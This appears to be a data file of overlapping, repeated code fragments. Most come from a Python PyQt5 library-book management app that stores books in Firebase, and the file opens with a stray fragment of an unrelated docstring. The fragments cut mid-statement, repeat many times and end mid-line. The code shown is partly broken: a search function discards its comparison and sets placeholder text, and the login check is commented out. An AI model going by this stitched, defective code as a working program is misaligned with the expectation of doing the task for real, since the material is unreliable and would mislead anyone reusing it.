name: Name of feature", "of feature column. default: Default value for the column. log_base: Base of logarithm", "removable_tags: list of html tags whose text should be ignored word2vec_dict: Dictionary of" ]
[ "import Ui_MainWindow as Ui_Adm_Livro from Telas_Usuario.cad_livro import Ui_MainWindow as Ui_Cadastro_Livro from Telas_Usuario.editar_livro import", "def cadastrando_livro(self): livro = { 'titulo': self.cadastro_livro.title.text(), 'autor' : self.cadastro_livro.autor.text(), 'isbn' : self.cadastro_livro.isbn.text(),", "= QtWidgets.QStackedLayout() self.stack0 = QtWidgets.QMainWindow() self.stack1 = QtWidgets.QMainWindow() self.stack2 = QtWidgets.QMainWindow() self.stack3 =", "Ui_MainWindow as Ui_Listar_Livro from Telas_Usuario.remover_livro import Ui_MainWindow as Ui_Remover_Livro import os from PyQt5.QtCore", "QMainWindow, QMessageBox, QApplication import sys from Telas_Usuario.tela_de_login import Ui_Tela_Login from Telas_Usuario.adm_livro import Ui_MainWindow", "self.QtStack.setCurrentIndex(3) def edit_livro(self): self.QtStack.setCurrentIndex(4) def deletar_livro(self): self.QtStack.setCurrentIndex(5) def voltar_P_login(self): self.QtStack.setCurrentIndex(0) def voltar_P_telaAdm(self): self.QtStack.setCurrentIndex(1)", "self.listar_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.editar_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.remover_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.cadastro_livro.salvar_livro.clicked.connect(self.cadastrando_livro) self.remover_livroo.bottonBisbn_2.clicked.connect(self.apagar) #self.remover_livroo.excluir_livro.clicked.connect(self.apagar) self.listar_livroo.bottonBisbn.clicked.connect(self.buscar) def admnistracao_livro(self): '''if self.tela_login.email_login.text() == ''", "self.adm_livro.edit_livro.clicked.connect(self.edit_livro) self.adm_livro.remove_livro.clicked.connect(self.deletar_livro) self.adm_livro.voltar.clicked.connect(self.voltar_P_login) self.cadastro_livro.voltar.clicked.connect(self.voltar_P_telaAdm) self.listar_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.editar_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.remover_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.cadastro_livro.salvar_livro.clicked.connect(self.cadastrando_livro) self.remover_livroo.bottonBisbn_2.clicked.connect(self.apagar) #self.remover_livroo.excluir_livro.clicked.connect(self.apagar) self.listar_livroo.bottonBisbn.clicked.connect(self.buscar) def admnistracao_livro(self):", "campos invalidos!') else:''' self.QtStack.setCurrentIndex(1) def cadast_livro(self): self.QtStack.setCurrentIndex(2) def listar_livros(self): self.QtStack.setCurrentIndex(3) def edit_livro(self): self.QtStack.setCurrentIndex(4)", "self.stack0 = QtWidgets.QMainWindow() self.stack1 = QtWidgets.QMainWindow() self.stack2 = QtWidgets.QMainWindow() self.stack3 = QtWidgets.QMainWindow() self.stack4", "result = self.remover_livroo.BuscaISBN_2.text() self._firebase.remover_Livro(result) self.QtStack.setCurrentIndex(1) def buscar(self): isbn = self.listar_livroo.BuscaISBN.text() if isbn ==", "'storageBucket': \"\", 'messagingSenderId': \"1080656799035\", 'appId': \"1:1080656799035:web:0064e0d7e84c5e7d\"} class Ui_Main(QtWidgets.QWidget): def setupUi(self, Main): Main.setObjectName('Main') Main.resize(800,", "firebase(firebaseConfig) self.tela_login.entrar.clicked.connect(self.admnistracao_livro) self.adm_livro.cad_livro.clicked.connect(self.cadast_livro) self.adm_livro.list_livro.clicked.connect(self.listar_livros) self.adm_livro.edit_livro.clicked.connect(self.edit_livro) self.adm_livro.remove_livro.clicked.connect(self.deletar_livro) self.adm_livro.voltar.clicked.connect(self.voltar_P_login) self.cadastro_livro.voltar.clicked.connect(self.voltar_P_telaAdm) self.listar_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.editar_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.remover_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.cadastro_livro.salvar_livro.clicked.connect(self.cadastrando_livro) self.remover_livroo.bottonBisbn_2.clicked.connect(self.apagar)", "QMessageBox, QApplication import sys from Telas_Usuario.tela_de_login import Ui_Tela_Login from Telas_Usuario.adm_livro import Ui_MainWindow as", "QtWidgets.QMainWindow() self.stack4 = QtWidgets.QMainWindow() self.stack5 = QtWidgets.QMainWindow() self.tela_login = Ui_Tela_Login() self.tela_login.setupUi(self.stack0) self.adm_livro =", "isbn == self._firebase.buscaFirebase() self.listar_livroo.result_buscaLivro.setText('adasd') if __name__ == '__main__': app = QApplication(sys.argv) show_main =", "self.editar_livroo.setupUi(self.stack4) self.remover_livroo = Ui_Remover_Livro() self.remover_livroo.setupUi(self.stack5) self.QtStack.addWidget(self.stack0) self.QtStack.addWidget(self.stack1) self.QtStack.addWidget(self.stack2) self.QtStack.addWidget(self.stack3) self.QtStack.addWidget(self.stack4) self.QtStack.addWidget(self.stack5) class Main(QMainWindow,", "Telas_Usuario.tela_de_login import Ui_Tela_Login from Telas_Usuario.adm_livro import Ui_MainWindow as Ui_Adm_Livro from Telas_Usuario.cad_livro import Ui_MainWindow", "self.QtStack.setCurrentIndex(1) def apagar(self): result = self.remover_livroo.BuscaISBN_2.text() self._firebase.remover_Livro(result) self.QtStack.setCurrentIndex(1) def buscar(self): isbn = self.listar_livroo.BuscaISBN.text()", "as Ui_Listar_Livro from Telas_Usuario.remover_livro import Ui_MainWindow as Ui_Remover_Livro import os from PyQt5.QtCore import", "self.adm_livro = Ui_Adm_Livro() self.adm_livro.setupUi(self.stack1) self.cadastro_livro = Ui_Cadastro_Livro() self.cadastro_livro.setupUi(self.stack2) self.listar_livroo = Ui_Listar_Livro() self.listar_livroo.setupUi(self.stack3) self.editar_livroo", "#self.remover_livroo.excluir_livro.clicked.connect(self.apagar) self.listar_livroo.bottonBisbn.clicked.connect(self.buscar) def admnistracao_livro(self): '''if self.tela_login.email_login.text() == '' or self.tela_login.senha.text() == '': return", "self._firebase.buscaFirebase() self.listar_livroo.result_buscaLivro.setText('adasd') if __name__ == '__main__': app = QApplication(sys.argv) show_main = Main() sys.exit(app.exec_())", "from Telas_Usuario.editar_livro import Ui_MainWindow as Ui_Editar_Livro from Telas_Usuario.listar_livro import Ui_MainWindow as Ui_Listar_Livro from", "Telas_Usuario.editar_livro import Ui_MainWindow as Ui_Editar_Livro from Telas_Usuario.listar_livro import Ui_MainWindow as Ui_Listar_Livro from Telas_Usuario.remover_livro", "Telas_Usuario.listar_livro import Ui_MainWindow as Ui_Listar_Livro from Telas_Usuario.remover_livro import Ui_MainWindow as Ui_Remover_Livro import os", "== '': return QMessageBox.about(self, 'Atenção', 'Desculpe, campos invalidos!') else:''' self.QtStack.setCurrentIndex(1) def cadast_livro(self): self.QtStack.setCurrentIndex(2)", "'databaseURL': \"https://biblioteca-b2317.firebaseio.com\", 'projectId': \"biblioteca-b2317\", 'storageBucket': \"\", 'messagingSenderId': \"1080656799035\", 'appId': \"1:1080656799035:web:0064e0d7e84c5e7d\"} class Ui_Main(QtWidgets.QWidget): def", "= Ui_Editar_Livro() self.editar_livroo.setupUi(self.stack4) self.remover_livroo = Ui_Remover_Livro() self.remover_livroo.setupUi(self.stack5) self.QtStack.addWidget(self.stack0) self.QtStack.addWidget(self.stack1) self.QtStack.addWidget(self.stack2) self.QtStack.addWidget(self.stack3) self.QtStack.addWidget(self.stack4) self.QtStack.addWidget(self.stack5)", "if isbn == self._firebase.buscaFirebase() self.listar_livroo.result_buscaLivro.setText('adasd') if __name__ == '__main__': app = QApplication(sys.argv) show_main", "self.QtStack.addWidget(self.stack5) class Main(QMainWindow, Ui_Main): def __init__(self, parent=None): super(Main, self).__init__(parent) self.setupUi(self) self._firebase = firebase(firebaseConfig)", "PyQt5 import QtCore, QtGui, QtWidgets from PyQt5.QtWidgets import QMainWindow, QMessageBox, QApplication import sys", "self.QtStack.addWidget(self.stack3) self.QtStack.addWidget(self.stack4) self.QtStack.addWidget(self.stack5) class Main(QMainWindow, Ui_Main): def __init__(self, parent=None): super(Main, self).__init__(parent) self.setupUi(self) self._firebase", "Ui_Remover_Livro import os from PyQt5.QtCore import pyqtSlot from firebase import firebase firebaseConfig =", "QtCore, QtGui, QtWidgets from PyQt5.QtWidgets import QMainWindow, QMessageBox, QApplication import sys from Telas_Usuario.tela_de_login", "\"1:1080656799035:web:0064e0d7e84c5e7d\"} class Ui_Main(QtWidgets.QWidget): def setupUi(self, Main): Main.setObjectName('Main') Main.resize(800, 600) self.QtStack = QtWidgets.QStackedLayout() self.stack0", "self._firebase.addLivro(livro) self.QtStack.setCurrentIndex(1) def apagar(self): result = self.remover_livroo.BuscaISBN_2.text() self._firebase.remover_Livro(result) self.QtStack.setCurrentIndex(1) def buscar(self): isbn =", "= QtWidgets.QMainWindow() self.stack3 = QtWidgets.QMainWindow() self.stack4 = QtWidgets.QMainWindow() self.stack5 = QtWidgets.QMainWindow() self.tela_login =", "Main(QMainWindow, Ui_Main): def __init__(self, parent=None): super(Main, self).__init__(parent) self.setupUi(self) self._firebase = firebase(firebaseConfig) self.tela_login.entrar.clicked.connect(self.admnistracao_livro) self.adm_livro.cad_livro.clicked.connect(self.cadast_livro)", "from Telas_Usuario.listar_livro import Ui_MainWindow as Ui_Listar_Livro from Telas_Usuario.remover_livro import Ui_MainWindow as Ui_Remover_Livro import", "self).__init__(parent) self.setupUi(self) self._firebase = firebase(firebaseConfig) self.tela_login.entrar.clicked.connect(self.admnistracao_livro) self.adm_livro.cad_livro.clicked.connect(self.cadast_livro) self.adm_livro.list_livro.clicked.connect(self.listar_livros) self.adm_livro.edit_livro.clicked.connect(self.edit_livro) self.adm_livro.remove_livro.clicked.connect(self.deletar_livro) self.adm_livro.voltar.clicked.connect(self.voltar_P_login) self.cadastro_livro.voltar.clicked.connect(self.voltar_P_telaAdm) self.listar_livroo.voltar.clicked.connect(self.voltar_P_telaAdm)", "def listar_livros(self): self.QtStack.setCurrentIndex(3) def edit_livro(self): self.QtStack.setCurrentIndex(4) def deletar_livro(self): self.QtStack.setCurrentIndex(5) def voltar_P_login(self): self.QtStack.setCurrentIndex(0) def", "Ui_Adm_Livro from Telas_Usuario.cad_livro import Ui_MainWindow as Ui_Cadastro_Livro from Telas_Usuario.editar_livro import Ui_MainWindow as Ui_Editar_Livro", "def __init__(self, parent=None): super(Main, self).__init__(parent) self.setupUi(self) self._firebase = firebase(firebaseConfig) self.tela_login.entrar.clicked.connect(self.admnistracao_livro) self.adm_livro.cad_livro.clicked.connect(self.cadast_livro) self.adm_livro.list_livro.clicked.connect(self.listar_livros) self.adm_livro.edit_livro.clicked.connect(self.edit_livro)", "PyQt5.QtCore import pyqtSlot from firebase import firebase firebaseConfig = { 'apiKey': \"<KEY>\", 'authDomain':", "from Telas_Usuario.remover_livro import Ui_MainWindow as Ui_Remover_Livro import os from PyQt5.QtCore import pyqtSlot from", "import firebase firebaseConfig = { 'apiKey': \"<KEY>\", 'authDomain': \"biblioteca-b2317.firebaseapp.com\", 'databaseURL': \"https://biblioteca-b2317.firebaseio.com\", 'projectId': \"biblioteca-b2317\",", "= { 'apiKey': \"<KEY>\", 'authDomain': \"biblioteca-b2317.firebaseapp.com\", 'databaseURL': \"https://biblioteca-b2317.firebaseio.com\", 'projectId': \"biblioteca-b2317\", 'storageBucket': \"\", 'messagingSenderId':", "== self._firebase.buscaFirebase() self.listar_livroo.result_buscaLivro.setText('adasd') if __name__ == '__main__': app = QApplication(sys.argv) show_main = Main()", "Ui_MainWindow as Ui_Remover_Livro import os from PyQt5.QtCore import pyqtSlot from firebase import firebase", "self.remover_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.cadastro_livro.salvar_livro.clicked.connect(self.cadastrando_livro) self.remover_livroo.bottonBisbn_2.clicked.connect(self.apagar) #self.remover_livroo.excluir_livro.clicked.connect(self.apagar) self.listar_livroo.bottonBisbn.clicked.connect(self.buscar) def admnistracao_livro(self): '''if self.tela_login.email_login.text() == '' or self.tela_login.senha.text()", "self.listar_livroo.bottonBisbn.clicked.connect(self.buscar) def admnistracao_livro(self): '''if self.tela_login.email_login.text() == '' or self.tela_login.senha.text() == '': return QMessageBox.about(self,", "self.tela_login.senha.text() == '': return QMessageBox.about(self, 'Atenção', 'Desculpe, campos invalidos!') else:''' self.QtStack.setCurrentIndex(1) def cadast_livro(self):", "firebaseConfig = { 'apiKey': \"<KEY>\", 'authDomain': \"biblioteca-b2317.firebaseapp.com\", 'databaseURL': \"https://biblioteca-b2317.firebaseio.com\", 'projectId': \"biblioteca-b2317\", 'storageBucket': \"\",", "Ui_Main(QtWidgets.QWidget): def setupUi(self, Main): Main.setObjectName('Main') Main.resize(800, 600) self.QtStack = QtWidgets.QStackedLayout() self.stack0 = QtWidgets.QMainWindow()", "Ui_Tela_Login() self.tela_login.setupUi(self.stack0) self.adm_livro = Ui_Adm_Livro() self.adm_livro.setupUi(self.stack1) self.cadastro_livro = Ui_Cadastro_Livro() self.cadastro_livro.setupUi(self.stack2) self.listar_livroo = Ui_Listar_Livro()", "livro = { 'titulo': self.cadastro_livro.title.text(), 'autor' : self.cadastro_livro.autor.text(), 'isbn' : self.cadastro_livro.isbn.text(), 'editora' :", "import sys from Telas_Usuario.tela_de_login import Ui_Tela_Login from Telas_Usuario.adm_livro import Ui_MainWindow as Ui_Adm_Livro from", "'messagingSenderId': \"1080656799035\", 'appId': \"1:1080656799035:web:0064e0d7e84c5e7d\"} class Ui_Main(QtWidgets.QWidget): def setupUi(self, Main): Main.setObjectName('Main') Main.resize(800, 600) self.QtStack", "from Telas_Usuario.adm_livro import Ui_MainWindow as Ui_Adm_Livro from Telas_Usuario.cad_livro import Ui_MainWindow as Ui_Cadastro_Livro from", "\"https://biblioteca-b2317.firebaseio.com\", 'projectId': \"biblioteca-b2317\", 'storageBucket': \"\", 'messagingSenderId': \"1080656799035\", 'appId': \"1:1080656799035:web:0064e0d7e84c5e7d\"} class Ui_Main(QtWidgets.QWidget): def setupUi(self,", "self._firebase = firebase(firebaseConfig) self.tela_login.entrar.clicked.connect(self.admnistracao_livro) self.adm_livro.cad_livro.clicked.connect(self.cadast_livro) self.adm_livro.list_livro.clicked.connect(self.listar_livros) self.adm_livro.edit_livro.clicked.connect(self.edit_livro) self.adm_livro.remove_livro.clicked.connect(self.deletar_livro) self.adm_livro.voltar.clicked.connect(self.voltar_P_login) self.cadastro_livro.voltar.clicked.connect(self.voltar_P_telaAdm) self.listar_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.editar_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.remover_livroo.voltar.clicked.connect(self.voltar_P_telaAdm)", "self.adm_livro.cad_livro.clicked.connect(self.cadast_livro) self.adm_livro.list_livro.clicked.connect(self.listar_livros) self.adm_livro.edit_livro.clicked.connect(self.edit_livro) self.adm_livro.remove_livro.clicked.connect(self.deletar_livro) self.adm_livro.voltar.clicked.connect(self.voltar_P_login) self.cadastro_livro.voltar.clicked.connect(self.voltar_P_telaAdm) self.listar_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.editar_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.remover_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.cadastro_livro.salvar_livro.clicked.connect(self.cadastrando_livro) self.remover_livroo.bottonBisbn_2.clicked.connect(self.apagar) #self.remover_livroo.excluir_livro.clicked.connect(self.apagar) self.listar_livroo.bottonBisbn.clicked.connect(self.buscar)", "import pyqtSlot from firebase import firebase firebaseConfig = { 'apiKey': \"<KEY>\", 'authDomain': \"biblioteca-b2317.firebaseapp.com\",", "'Atenção', 'Desculpe, campos invalidos!') else:''' self.QtStack.setCurrentIndex(1) def cadast_livro(self): self.QtStack.setCurrentIndex(2) def listar_livros(self): self.QtStack.setCurrentIndex(3) def", "} self._firebase.addLivro(livro) self.QtStack.setCurrentIndex(1) def apagar(self): result = self.remover_livroo.BuscaISBN_2.text() self._firebase.remover_Livro(result) self.QtStack.setCurrentIndex(1) def buscar(self): isbn", "self.remover_livroo = Ui_Remover_Livro() self.remover_livroo.setupUi(self.stack5) self.QtStack.addWidget(self.stack0) self.QtStack.addWidget(self.stack1) self.QtStack.addWidget(self.stack2) self.QtStack.addWidget(self.stack3) self.QtStack.addWidget(self.stack4) self.QtStack.addWidget(self.stack5) class Main(QMainWindow, Ui_Main):", "self.setupUi(self) self._firebase = firebase(firebaseConfig) self.tela_login.entrar.clicked.connect(self.admnistracao_livro) self.adm_livro.cad_livro.clicked.connect(self.cadast_livro) self.adm_livro.list_livro.clicked.connect(self.listar_livros) self.adm_livro.edit_livro.clicked.connect(self.edit_livro) self.adm_livro.remove_livro.clicked.connect(self.deletar_livro) self.adm_livro.voltar.clicked.connect(self.voltar_P_login) self.cadastro_livro.voltar.clicked.connect(self.voltar_P_telaAdm) self.listar_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.editar_livroo.voltar.clicked.connect(self.voltar_P_telaAdm)", "= self.remover_livroo.BuscaISBN_2.text() self._firebase.remover_Livro(result) self.QtStack.setCurrentIndex(1) def buscar(self): isbn = self.listar_livroo.BuscaISBN.text() if isbn == self._firebase.buscaFirebase()", "\"<KEY>\", 'authDomain': \"biblioteca-b2317.firebaseapp.com\", 'databaseURL': \"https://biblioteca-b2317.firebaseio.com\", 'projectId': \"biblioteca-b2317\", 'storageBucket': \"\", 'messagingSenderId': \"1080656799035\", 'appId': \"1:1080656799035:web:0064e0d7e84c5e7d\"}", "edit_livro(self): self.QtStack.setCurrentIndex(4) def deletar_livro(self): self.QtStack.setCurrentIndex(5) def voltar_P_login(self): self.QtStack.setCurrentIndex(0) def voltar_P_telaAdm(self): self.QtStack.setCurrentIndex(1) def cadastrando_livro(self):", "pyqtSlot from firebase import firebase firebaseConfig = { 'apiKey': \"<KEY>\", 'authDomain': \"biblioteca-b2317.firebaseapp.com\", 'databaseURL':", "self.cadastro_livro = Ui_Cadastro_Livro() self.cadastro_livro.setupUi(self.stack2) self.listar_livroo = Ui_Listar_Livro() self.listar_livroo.setupUi(self.stack3) self.editar_livroo = Ui_Editar_Livro() self.editar_livroo.setupUi(self.stack4) self.remover_livroo", "as Ui_Editar_Livro from Telas_Usuario.listar_livro import Ui_MainWindow as Ui_Listar_Livro from Telas_Usuario.remover_livro import Ui_MainWindow as", "sys from Telas_Usuario.tela_de_login import Ui_Tela_Login from Telas_Usuario.adm_livro import Ui_MainWindow as Ui_Adm_Livro from Telas_Usuario.cad_livro", "import os from PyQt5.QtCore import pyqtSlot from firebase import firebase firebaseConfig = {", "Ui_Adm_Livro() self.adm_livro.setupUi(self.stack1) self.cadastro_livro = Ui_Cadastro_Livro() self.cadastro_livro.setupUi(self.stack2) self.listar_livroo = Ui_Listar_Livro() self.listar_livroo.setupUi(self.stack3) self.editar_livroo = Ui_Editar_Livro()", "self._firebase.remover_Livro(result) self.QtStack.setCurrentIndex(1) def buscar(self): isbn = self.listar_livroo.BuscaISBN.text() if isbn == self._firebase.buscaFirebase() self.listar_livroo.result_buscaLivro.setText('adasd') if", "Ui_Main): def __init__(self, parent=None): super(Main, self).__init__(parent) self.setupUi(self) self._firebase = firebase(firebaseConfig) self.tela_login.entrar.clicked.connect(self.admnistracao_livro) self.adm_livro.cad_livro.clicked.connect(self.cadast_livro) self.adm_livro.list_livro.clicked.connect(self.listar_livros)", "= QtWidgets.QMainWindow() self.stack5 = QtWidgets.QMainWindow() self.tela_login = Ui_Tela_Login() self.tela_login.setupUi(self.stack0) self.adm_livro = Ui_Adm_Livro() self.adm_livro.setupUi(self.stack1)", "Ui_Listar_Livro from Telas_Usuario.remover_livro import Ui_MainWindow as Ui_Remover_Livro import os from PyQt5.QtCore import pyqtSlot", "= Ui_Listar_Livro() self.listar_livroo.setupUi(self.stack3) self.editar_livroo = Ui_Editar_Livro() self.editar_livroo.setupUi(self.stack4) self.remover_livroo = Ui_Remover_Livro() self.remover_livroo.setupUi(self.stack5) self.QtStack.addWidget(self.stack0) self.QtStack.addWidget(self.stack1)", "{ 'apiKey': \"<KEY>\", 'authDomain': \"biblioteca-b2317.firebaseapp.com\", 'databaseURL': \"https://biblioteca-b2317.firebaseio.com\", 'projectId': \"biblioteca-b2317\", 'storageBucket': \"\", 'messagingSenderId': \"1080656799035\",", "def setupUi(self, Main): Main.setObjectName('Main') Main.resize(800, 600) self.QtStack = QtWidgets.QStackedLayout() self.stack0 = QtWidgets.QMainWindow() self.stack1", "self.editar_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.remover_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.cadastro_livro.salvar_livro.clicked.connect(self.cadastrando_livro) self.remover_livroo.bottonBisbn_2.clicked.connect(self.apagar) #self.remover_livroo.excluir_livro.clicked.connect(self.apagar) self.listar_livroo.bottonBisbn.clicked.connect(self.buscar) def admnistracao_livro(self): '''if self.tela_login.email_login.text() == '' or", "invalidos!') else:''' self.QtStack.setCurrentIndex(1) def cadast_livro(self): self.QtStack.setCurrentIndex(2) def listar_livros(self): self.QtStack.setCurrentIndex(3) def edit_livro(self): self.QtStack.setCurrentIndex(4) def", "self.QtStack.addWidget(self.stack2) self.QtStack.addWidget(self.stack3) self.QtStack.addWidget(self.stack4) self.QtStack.addWidget(self.stack5) class Main(QMainWindow, Ui_Main): def __init__(self, parent=None): super(Main, self).__init__(parent) self.setupUi(self)", "super(Main, self).__init__(parent) self.setupUi(self) self._firebase = firebase(firebaseConfig) self.tela_login.entrar.clicked.connect(self.admnistracao_livro) self.adm_livro.cad_livro.clicked.connect(self.cadast_livro) self.adm_livro.list_livro.clicked.connect(self.listar_livros) self.adm_livro.edit_livro.clicked.connect(self.edit_livro) self.adm_livro.remove_livro.clicked.connect(self.deletar_livro) self.adm_livro.voltar.clicked.connect(self.voltar_P_login) self.cadastro_livro.voltar.clicked.connect(self.voltar_P_telaAdm)", "deletar_livro(self): self.QtStack.setCurrentIndex(5) def voltar_P_login(self): self.QtStack.setCurrentIndex(0) def voltar_P_telaAdm(self): self.QtStack.setCurrentIndex(1) def cadastrando_livro(self): livro = {", "self.cadastro_livro.title.text(), 'autor' : self.cadastro_livro.autor.text(), 'isbn' : self.cadastro_livro.isbn.text(), 'editora' : self.cadastro_livro.editora.text(), } self._firebase.addLivro(livro) self.QtStack.setCurrentIndex(1)", "Telas_Usuario.remover_livro import Ui_MainWindow as Ui_Remover_Livro import os from PyQt5.QtCore import pyqtSlot from firebase", "firebase firebaseConfig = { 'apiKey': \"<KEY>\", 'authDomain': \"biblioteca-b2317.firebaseapp.com\", 'databaseURL': \"https://biblioteca-b2317.firebaseio.com\", 'projectId': \"biblioteca-b2317\", 'storageBucket':", "self.QtStack.setCurrentIndex(1) def buscar(self): isbn = self.listar_livroo.BuscaISBN.text() if isbn == self._firebase.buscaFirebase() self.listar_livroo.result_buscaLivro.setText('adasd') if __name__", "600) self.QtStack = QtWidgets.QStackedLayout() self.stack0 = QtWidgets.QMainWindow() self.stack1 = QtWidgets.QMainWindow() self.stack2 = QtWidgets.QMainWindow()", "= QtWidgets.QMainWindow() self.stack4 = QtWidgets.QMainWindow() self.stack5 = QtWidgets.QMainWindow() self.tela_login = Ui_Tela_Login() self.tela_login.setupUi(self.stack0) self.adm_livro", ": self.cadastro_livro.editora.text(), } self._firebase.addLivro(livro) self.QtStack.setCurrentIndex(1) def apagar(self): result = self.remover_livroo.BuscaISBN_2.text() self._firebase.remover_Livro(result) self.QtStack.setCurrentIndex(1) def", "self.adm_livro.remove_livro.clicked.connect(self.deletar_livro) self.adm_livro.voltar.clicked.connect(self.voltar_P_login) self.cadastro_livro.voltar.clicked.connect(self.voltar_P_telaAdm) self.listar_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.editar_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.remover_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.cadastro_livro.salvar_livro.clicked.connect(self.cadastrando_livro) self.remover_livroo.bottonBisbn_2.clicked.connect(self.apagar) #self.remover_livroo.excluir_livro.clicked.connect(self.apagar) self.listar_livroo.bottonBisbn.clicked.connect(self.buscar) def admnistracao_livro(self): '''if", "self.remover_livroo.BuscaISBN_2.text() self._firebase.remover_Livro(result) self.QtStack.setCurrentIndex(1) def buscar(self): isbn = self.listar_livroo.BuscaISBN.text() if isbn == self._firebase.buscaFirebase() self.listar_livroo.result_buscaLivro.setText('adasd')", "self.cadastro_livro.isbn.text(), 'editora' : self.cadastro_livro.editora.text(), } self._firebase.addLivro(livro) self.QtStack.setCurrentIndex(1) def apagar(self): result = self.remover_livroo.BuscaISBN_2.text() self._firebase.remover_Livro(result)", "as Ui_Remover_Livro import os from PyQt5.QtCore import pyqtSlot from firebase import firebase firebaseConfig", "self.cadastro_livro.setupUi(self.stack2) self.listar_livroo = Ui_Listar_Livro() self.listar_livroo.setupUi(self.stack3) self.editar_livroo = Ui_Editar_Livro() self.editar_livroo.setupUi(self.stack4) self.remover_livroo = Ui_Remover_Livro() self.remover_livroo.setupUi(self.stack5)", "'projectId': \"biblioteca-b2317\", 'storageBucket': \"\", 'messagingSenderId': \"1080656799035\", 'appId': \"1:1080656799035:web:0064e0d7e84c5e7d\"} class Ui_Main(QtWidgets.QWidget): def setupUi(self, Main):", "QtGui, QtWidgets from PyQt5.QtWidgets import QMainWindow, QMessageBox, QApplication import sys from Telas_Usuario.tela_de_login import", "PyQt5.QtWidgets import QMainWindow, QMessageBox, QApplication import sys from Telas_Usuario.tela_de_login import Ui_Tela_Login from Telas_Usuario.adm_livro", "or self.tela_login.senha.text() == '': return QMessageBox.about(self, 'Atenção', 'Desculpe, campos invalidos!') else:''' self.QtStack.setCurrentIndex(1) def", "from PyQt5.QtWidgets import QMainWindow, QMessageBox, QApplication import sys from Telas_Usuario.tela_de_login import Ui_Tela_Login from", "= firebase(firebaseConfig) self.tela_login.entrar.clicked.connect(self.admnistracao_livro) self.adm_livro.cad_livro.clicked.connect(self.cadast_livro) self.adm_livro.list_livro.clicked.connect(self.listar_livros) self.adm_livro.edit_livro.clicked.connect(self.edit_livro) self.adm_livro.remove_livro.clicked.connect(self.deletar_livro) self.adm_livro.voltar.clicked.connect(self.voltar_P_login) self.cadastro_livro.voltar.clicked.connect(self.voltar_P_telaAdm) self.listar_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.editar_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.remover_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.cadastro_livro.salvar_livro.clicked.connect(self.cadastrando_livro)", "\"biblioteca-b2317\", 'storageBucket': \"\", 'messagingSenderId': \"1080656799035\", 'appId': \"1:1080656799035:web:0064e0d7e84c5e7d\"} class Ui_Main(QtWidgets.QWidget): def setupUi(self, Main): Main.setObjectName('Main')", "= { 'titulo': self.cadastro_livro.title.text(), 'autor' : self.cadastro_livro.autor.text(), 'isbn' : self.cadastro_livro.isbn.text(), 'editora' : self.cadastro_livro.editora.text(),", "def buscar(self): isbn = self.listar_livroo.BuscaISBN.text() if isbn == self._firebase.buscaFirebase() self.listar_livroo.result_buscaLivro.setText('adasd') if __name__ ==", "Ui_Editar_Livro from Telas_Usuario.listar_livro import Ui_MainWindow as Ui_Listar_Livro from Telas_Usuario.remover_livro import Ui_MainWindow as Ui_Remover_Livro", "'isbn' : self.cadastro_livro.isbn.text(), 'editora' : self.cadastro_livro.editora.text(), } self._firebase.addLivro(livro) self.QtStack.setCurrentIndex(1) def apagar(self): result =", "class Main(QMainWindow, Ui_Main): def __init__(self, parent=None): super(Main, self).__init__(parent) self.setupUi(self) self._firebase = firebase(firebaseConfig) self.tela_login.entrar.clicked.connect(self.admnistracao_livro)", "voltar_P_telaAdm(self): self.QtStack.setCurrentIndex(1) def cadastrando_livro(self): livro = { 'titulo': self.cadastro_livro.title.text(), 'autor' : self.cadastro_livro.autor.text(), 'isbn'", "QMessageBox.about(self, 'Atenção', 'Desculpe, campos invalidos!') else:''' self.QtStack.setCurrentIndex(1) def cadast_livro(self): self.QtStack.setCurrentIndex(2) def listar_livros(self): self.QtStack.setCurrentIndex(3)", "apagar(self): result = self.remover_livroo.BuscaISBN_2.text() self._firebase.remover_Livro(result) self.QtStack.setCurrentIndex(1) def buscar(self): isbn = self.listar_livroo.BuscaISBN.text() if isbn", "'': return QMessageBox.about(self, 'Atenção', 'Desculpe, campos invalidos!') else:''' self.QtStack.setCurrentIndex(1) def cadast_livro(self): self.QtStack.setCurrentIndex(2) def", "self.tela_login.entrar.clicked.connect(self.admnistracao_livro) self.adm_livro.cad_livro.clicked.connect(self.cadast_livro) self.adm_livro.list_livro.clicked.connect(self.listar_livros) self.adm_livro.edit_livro.clicked.connect(self.edit_livro) self.adm_livro.remove_livro.clicked.connect(self.deletar_livro) self.adm_livro.voltar.clicked.connect(self.voltar_P_login) self.cadastro_livro.voltar.clicked.connect(self.voltar_P_telaAdm) self.listar_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.editar_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.remover_livroo.voltar.clicked.connect(self.voltar_P_telaAdm) self.cadastro_livro.salvar_livro.clicked.connect(self.cadastrando_livro) self.remover_livroo.bottonBisbn_2.clicked.connect(self.apagar) #self.remover_livroo.excluir_livro.clicked.connect(self.apagar)", "cadast_livro(self): self.QtStack.setCurrentIndex(2) def listar_livros(self): self.QtStack.setCurrentIndex(3) def edit_livro(self): self.QtStack.setCurrentIndex(4) def deletar_livro(self): self.QtStack.setCurrentIndex(5) def voltar_P_login(self):", "Ui_Cadastro_Livro from Telas_Usuario.editar_livro import Ui_MainWindow as Ui_Editar_Livro from Telas_Usuario.listar_livro import Ui_MainWindow as Ui_Listar_Livro", "import QMainWindow, QMessageBox, QApplication import sys from 